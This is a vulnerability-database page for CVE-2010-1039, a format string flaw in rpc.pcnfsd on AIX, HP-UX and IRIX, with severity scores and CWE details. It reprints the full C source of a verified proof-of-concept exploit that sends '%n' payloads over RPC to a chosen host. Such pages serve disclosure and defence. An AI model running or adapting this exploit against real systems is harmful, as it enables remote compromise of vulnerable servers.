CVE-2010-1039 Detail

CVE-2010-1039

EPSS

25.91%V3

Vector

Network

Published

2010-05-20
15h00 +00:00

Modified

2018-10-10
16h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

Format string vulnerability in the _msgout function in rpc.pcnfsd in IBM AIX 6.1, 5.3, and earlier; IBM VIOS 2.1, 1.5, and earlier; NFS/ONCplus B.11.31_09 and earlier on HP HP-UX B.11.11, B.11.23, and B.11.31; and SGI IRIX 6.5 allows remote attackers to execute arbitrary code via an RPC request containing format string specifiers in an invalid directory name.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-134	Use of Externally-Controlled Format String The product uses a function that accepts a format string as an argument, but the format string originates from an external source.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	10		AV:N/AC:L/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 14407

Publication date : 2010-07-17 22h00 +00:00
Author : Rodrigo Rubira Branco
EDB Verified : Yes

/************************************************************************* * Check Point Software Technologies - Vulnerability Discovery Team (VDT) * * Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com> * * * * rpc.pcnfsd syslog format string vulnerability * *************************************************************************/ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <unistd.h> #include <rpc/rpc.h> #define PCNFSD_PROG 150001 #define PCNFSD_VERS 1 #define PCNFSD_PR_INIT 2 #define PCNFSD_PR_START 3 struct cm_send { char *s1; char *s2; }; struct cm_send2 { char *s1; char *s2; }; struct cm_reply { int i; }; bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp) { if(!xdr_wrapstring(xdrs, &objp->s1)) return (FALSE); if(!xdr_wrapstring(xdrs, &objp->s2)) return (FALSE); return (TRUE); } bool_t xdr_cm_send2(XDR *xdrs, struct cm_send2 *objp) { if(!xdr_wrapstring(xdrs, &objp->s1)) return (FALSE); if(!xdr_wrapstring(xdrs, &objp->s2)) return (FALSE); return (TRUE); } bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp) { if(!xdr_int(xdrs, &objp->i)) return (FALSE); return (TRUE); } int main(int argc, char *argv[]) { long ret, offset; int len, x, y, i; char *hostname, *b; CLIENT *cl; struct cm_send send; struct cm_send2 send2; struct cm_reply reply; struct timeval tm = { 10, 0 }; enum clnt_stat stat; printf("-= rpc.pcnfsd remote format string exploit, tested against AIX 6.1.0 and lower =-\n"); printf("-= Check Point Software Technologies - Vulnerability Discovery Team (VDT) =-\n"); printf("-= Rodrigo Rubira Branco <rbranco *noSPAM* checkpoint.com> =-\n\n"); if(argc < 2) { printf("Usage: %s [hostname]\n", argv[0]); exit(1); } hostname = argv[1]; send.s1 = "AAAA%n%n%n%n%n%n%n%n%n"; // Create the dir on /var/spool/pcnfs send.s2 = ""; send2.s1 = "AAAA%n%n%n%n%n%n%n%n%n";// Call the dir to trigger fmt bug send2.s2 = ""; printf("\nSending PCNFSD_PR_INIT to the server ... "); if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){ clnt_pcreateerror("\nerror");exit(-1); } stat=clnt_call(cl, PCNFSD_PR_INIT, xdr_cm_send, (caddr_t) &send, xdr_cm_reply, (caddr_t) &reply, tm); clnt_destroy(cl); printf("done!\n"); printf("Sending PCNFSD_PR_START procedure ... "); if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){ clnt_pcreateerror("\nerror");exit(-1); } cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL); stat=clnt_call(cl, PCNFSD_PR_START, xdr_cm_send2, (caddr_t) &send2, xdr_cm_reply, (caddr_t) &reply, tm); printf("done!\n"); clnt_destroy(cl); }